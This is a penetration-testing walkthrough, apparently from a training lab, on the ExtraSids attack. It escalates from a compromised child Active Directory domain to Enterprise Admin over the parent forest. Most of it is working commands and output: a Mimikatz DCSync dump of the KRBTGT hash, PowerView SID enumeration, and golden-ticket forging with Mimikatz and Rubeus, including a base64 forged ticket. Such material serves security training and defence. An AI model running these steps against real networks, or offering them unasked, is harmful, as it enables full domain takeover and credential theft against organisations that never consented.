Skip to content

ExtraSids from windows

This attack allows for the compromise of a parent domain once the child domain has been compromised. Within the same AD forest, the sidHistory property is respected due to a lack of SID Filtering protection. SID Filtering is a protection put in place to filter out authentication requests from a domain in another forest across a trust. Therefore, if a user in a child domain that has their sidHistory set to the Enterprise Admins group (which only exists in the parent domain), they are treated as a member of this group, which allows for administrative access to the entire forest. In other words, we are creating a Golden Ticket from the compromised child domain to compromise the parent domain. In this case, we will leverage the SIDHistory to grant an account (or non-existent account) Enterprise Admin rights by modifying this attribute to contain the SID for the Enterprise Admins group, which will give us full access to the parent domain without actually being part of the group.

To perform this attack after compromising a child domain, we need the following:

  • The KRBTGT hash for the child domain
    • First, we need to obtain the NT hash for the KRBTGT account, which is a service account for the Key Distribution Center (KDC) in Active Directory. The account KRB (Kerberos) TGT (Ticket Granting Ticket) is used to encrypt/sign all Kerberos tickets granted within a given domain. Domain controllers use the account's password to decrypt and validate Kerberos tickets. The KRBTGT account can be used to create Kerberos TGT tickets that can be used to request TGS tickets for any service on any host in the domain. This is also known as the Golden Ticket attack and is a well-known persistence mechanism for attackers in Active Directory environments. The only way to invalidate a Golden Ticket is to change the password of the KRBTGT account, which should be done periodically and definitely after a penetration test assessment where full domain compromise is reached.
  • The SID for the child domain
  • The name of a target user in the child domain (does not need to exist!)
  • The FQDN of the child domain.
  • The SID of the Enterprise Admins group of the root domain.

ExtraSids Attack - Mimikatz


Prerequisite

Compromised the child domain, log in as a Domain Admin or similar and perform the DCSync attack to obtain the NT hash for the KRBTGT account.

Collecting data

1. Obtaining the KRBTGT Account's NT Hash using Mimikatz

mimikatz> lsadump::dcsync /user:LOGISTICS\krbtgt
|->
Hash NTLM: 9d765b482771505cbe97411065964d5f

2. Obtaining SID for the child domain We can use the PowerView Get-DomainSID function to get the SID for the child domain, but this is also visible in the Mimikatz output above.

import-module .\PowerView.ps1
Get-DomainSID
|-> 
S-1-5-21-2806153819-209893948-922872689

3. Obtaining SID of the Enterprise Admins group of the root domain Next, we can use Get-DomainGroup from PowerView to obtain the SID for the Enterprise Admins group in the parent domain. We could also do this with the Get-ADGroup cmdlet with a command such as Get-ADGroup -Identity "Enterprise Admins" -Server "INLANEFREIGHT.LOCAL".

Get-DomainGroup -Domain INLANEFREIGHT.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsid
|->
distinguishedname                                       objectsid
-----------------                                       ---------
CN=Enterprise Admins,CN=Users,DC=INLANEFREIGHT,DC=LOCAL S-1-5-21-3842939050-3880317879-2865463114-519

4. Obtaining FQDN of the child domain

Import-Module .\PowerView.ps1
Get-DomainTrust
|->
SourceName      : LOGISTICS.INLANEFREIGHT.LOCAL

5. Name of a target user in the child domain

hascker

What we have

At this point, we have gathered the following data points:

  • The KRBTGT hash for the child domain: 9d765b482771505cbe97411065964d5f
  • The SID for the child domain: S-1-5-21-2806153819-209893948-922872689
  • The name of a target user in the child domain (does not need to exist to create our Golden Ticket!): We'll choose a fake user: hacker
  • The FQDN of the child domain: LOGISTICS.INLANEFREIGHT.LOCAL
  • The SID of the Enterprise Admins group of the root domain: S-1-5-21-3842939050-3880317879-2865463114-519

Executing Attack

Confirm that we DON'T have access before attack

ls \\academy-ea-dc01.inlanefreight.local\c$
|-> Access is denied

Creating a Golden Ticket with Mimikatz Using Mimikatz and the data listed above, we can create a Golden Ticket to access all resources within the parent domain.

mimikatz> kerberos::golden /user:hacker /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /ptt
|->
User      : hacker
Domain    : LOGISTICS.INLANEFREIGHT.LOCAL (LOGISTICS)
SID       : S-1-5-21-2806153819-209893948-922872689
User Id   : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-3842939050-3880317879-2865463114-519 ;
ServiceKey: 9d765b482771505cbe97411065964d5f - rc4_hmac_nt
Lifetime  : 3/25/2023 3:24:46 PM ; 3/22/2033 3:24:46 PM ; 3/22/2033 3:24:46 PM
-> Ticket : ** Pass The Ticket **

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Golden ticket for 'hacker @ LOGISTICS.INLANEFREIGHT.LOCAL' successfully submitted for current session

Confirming a Kerberos Ticket is in Memory Using klist

klist
|->
Cached Tickets: (1)

#0>     Client: hacker @ LOGISTICS.INLANEFREIGHT.LOCAL
        Server: krbtgt/LOGISTICS.INLANEFREIGHT.LOCAL @ LOGISTICS.INLANEFREIGHT.LOCAL
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
        Start Time: 3/25/2023 15:24:46 (local)
        End Time:   3/22/2033 15:24:46 (local)
        Renew Time: 3/22/2033 15:24:46 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called:

Listing the Entire C: Drive of the Domain Controller From here, it is possible to access any resources within the parent domain, and we could compromise the parent domain in several ways.

ls \\academy-ea-dc01.inlanefreight.local\c$
cd \\academy-ea-dc01.inlanefreight.local\c$

ExtraSids Attack - Rubeus


Confirm that we DON'T have access before attack

ls \\academy-ea-dc01.inlanefreight.local\c$
|-> Access is denied

Creating a Golden Ticket using Rubeus

.\Rubeus.exe golden /rc4:9d765b482771505cbe97411065964d5f /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689  /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /user:hacker /ptt
|->
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.0.2

[*] Action: Build TGT

[*] Building PAC

[*] Domain         : LOGISTICS.INLANEFREIGHT.LOCAL (LOGISTICS)
[*] SID            : S-1-5-21-2806153819-209893948-922872689
[*] UserId         : 500
[*] Groups         : 520,512,513,519,518
[*] ExtraSIDs      : S-1-5-21-3842939050-3880317879-2865463114-519
[*] ServiceKey     : 9D765B482771505CBE97411065964D5F
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_MD5
[*] KDCKey         : 9D765B482771505CBE97411065964D5F
[*] KDCKeyType     : KERB_CHECKSUM_HMAC_MD5
[*] Service        : krbtgt
[*] Target         : LOGISTICS.INLANEFREIGHT.LOCAL

[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGT for 'hacker@LOGISTICS.INLANEFREIGHT.LOCAL'

[*] AuthTime       : 3/25/2023 3:35:11 PM
[*] StartTime      : 3/25/2023 3:35:11 PM
[*] EndTime        : 3/26/2023 1:35:11 AM
[*] RenewTill      : 4/1/2023 3:35:11 PM
[*] base64(ticket.kirbi):

      doIF0zCCBc+gAwIBBaEDAgEWooIEnDCCBJhhggSUMIIEkKADAgEFoR8bHUxPR0lTVElDUy5JTkxBTkVG
      UkVJR0hULkxPQ0FMojIwMKADAgECoSkwJxsGa3JidGd0Gx1MT0dJU1RJQ1MuSU5MQU5FRlJFSUdIVC5M
      T0NBTKOCBDIwggQuoAMCARehAwIBA6KCBCAEggQcoQuqNtWORhnzjmVofcpVpYzBqdbKLCMGMK8ek9tS
      OVm1QreHmkBBSu3j8niInB/gcMBhdXoymOsuoz0s2VAxKIs8SoW4F3jw2vHvhRSy2VRGQ27wAq2wPNDO
      KVFWHMK4DUS4nYeiTMcwcbNp+f3povdnkBd2JzwjCqje1+edNIUhChuNtqBw/EZH78kkE6yqBNgfPzEw
      213Eg7EVSBZmczn+R9NbBiHlpG3Hya4fLZ0rtIqxROlWOOhUgB1vnrRCQ9GQ07/qyxAdLZ8ctVXpZ5t7
      5wzbWqohG9RElnqeeXKrH9MBAu0ou4lXlLiMxglOnXBtv/oBBLaDDn/eckuKCuRmX0LS6K5Xrex8If+l
      njGuGP0J85NRPg+wcDnxfLW9Oog5cYLzjr2zQ9i43caJIvy8PoSJ3WKwKZHA6oxt7PlGCzhO/oPwCaGN
      trhtzZGYhvJpaWwkFUzxNzh1CTJFK/kKVUEd9sOugpdFwvQmB74ERflAQ2fM4FNObPHqyxqUMed0/KTO
      Y7zo8aEgnkJgW/QskaEoHDaijNVB213tZTSe++yoRN0nFnfiDtkrCri/7sgMKjbYRBg+dFMXEqdhbteQ
      mMuteHKUNzF5G0/8ylZIMS8HsvIPuKJWxzeJqsgJ+GDYWvKoO4jLSD/puu+F64vJ3tn/YgohlOZb9DDG
      7Z6XEtwHTkOo06ofc1kLjz989O0lMayK+HiE0RQkeQitrkLc80EctpYg5OoGjggNP9rJADkU9rnIiUaF
      glzkcUCR5/vlY0LZQ/Q9HpbLMBP+iNEjySloUDMxq3kH/HUcUPr70/5L3LujgsV8acOBE63y+DJ3PT6j
      wraGUWL5S8h8HoxwKaTkhaNiRlGwsh1sjL2kvDctBcd0MP8SSk0tzkpVTp3aaOxJK0Eaj+3MbvtAO2M7
      pFGq8XbQXsLnFcKltfd0wVKBbVnt29SP2oZzDI9sqP1gsGccL+QAE5/sMQwdof5ju/sfk0EXeTS6k+lN
      JmmscqQphBjh4kD4uzwPG/oPdHZ11f4zmHDDOhkgjmlD4vlLuRTJdg38HjUWXpkuwLbQ8/RgZ8I6Pn+M
      cSoeeuEQHA5TYBPQhabYkbLzEtxzOWLhceW+K0cYHpMynF+o16b+TgdECRmplTvEofk2gR4wRuIoQ8pZ
      38dEpYx2ntKELUlvXlUe2VNAJ0uhMbE49LVxP53/xfVu97CUKmZJnG/iRWk9hurShqLQgsDJq32X4Czy
      s0Rd3TteNJKVKhfRmKk1ERreWzrfcDLi29Hk+erj+WWrGL66Bq49IMwCQzEbGDqhLYXrNEnsiaqdpapB
      ul1XnfCe8j6sOshP7bc9wM+c6mBgnUW+xUa3qDk+p4D6cSWFJ0OhjVmq/moajkE/kPPNTDczfQMNPVWw
      VmWjggEhMIIBHaADAgEAooIBFASCARB9ggEMMIIBCKCCAQQwggEAMIH9oBswGaADAgEXoRIEEIbY/Y/P
      2naeIWgVvstwj9ChHxsdTE9HSVNUSUNTLklOTEFORUZSRUlHSFQuTE9DQUyiEzARoAMCAQGhCjAIGwZo
      YWNrZXKjBwMFAEDgAACkERgPMjAyMzAzMjUyMjM1MTFapREYDzIwMjMwMzI1MjIzNTExWqYRGA8yMDIz
      MDMyNjA4MzUxMVqnERgPMjAyMzA0MDEyMjM1MTFaqB8bHUxPR0lTVElDUy5JTkxBTkVGUkVJR0hULkxP
      Q0FMqTIwMKADAgECoSkwJxsGa3JidGd0Gx1MT0dJU1RJQ1MuSU5MQU5FRlJFSUdIVC5MT0NBTA==


[+] Ticket successfully imported!

Confirming the Ticket is in Memory Using klist

klist
|->
Current LogonId is 0:0x708a1
Cached Tickets: (1)
#0>     Client: hacker @ LOGISTICS.INLANEFREIGHT.LOCAL
        Server: krbtgt/LOGISTICS.INLANEFREIGHT.LOCAL @ LOGISTICS.INLANEFREIGHT.LOCAL
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
        Start Time: 3/25/2023 15:35:11 (local)
        End Time:   3/26/2023 1:35:11 (local)
        Renew Time: 4/1/2023 15:35:11 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called: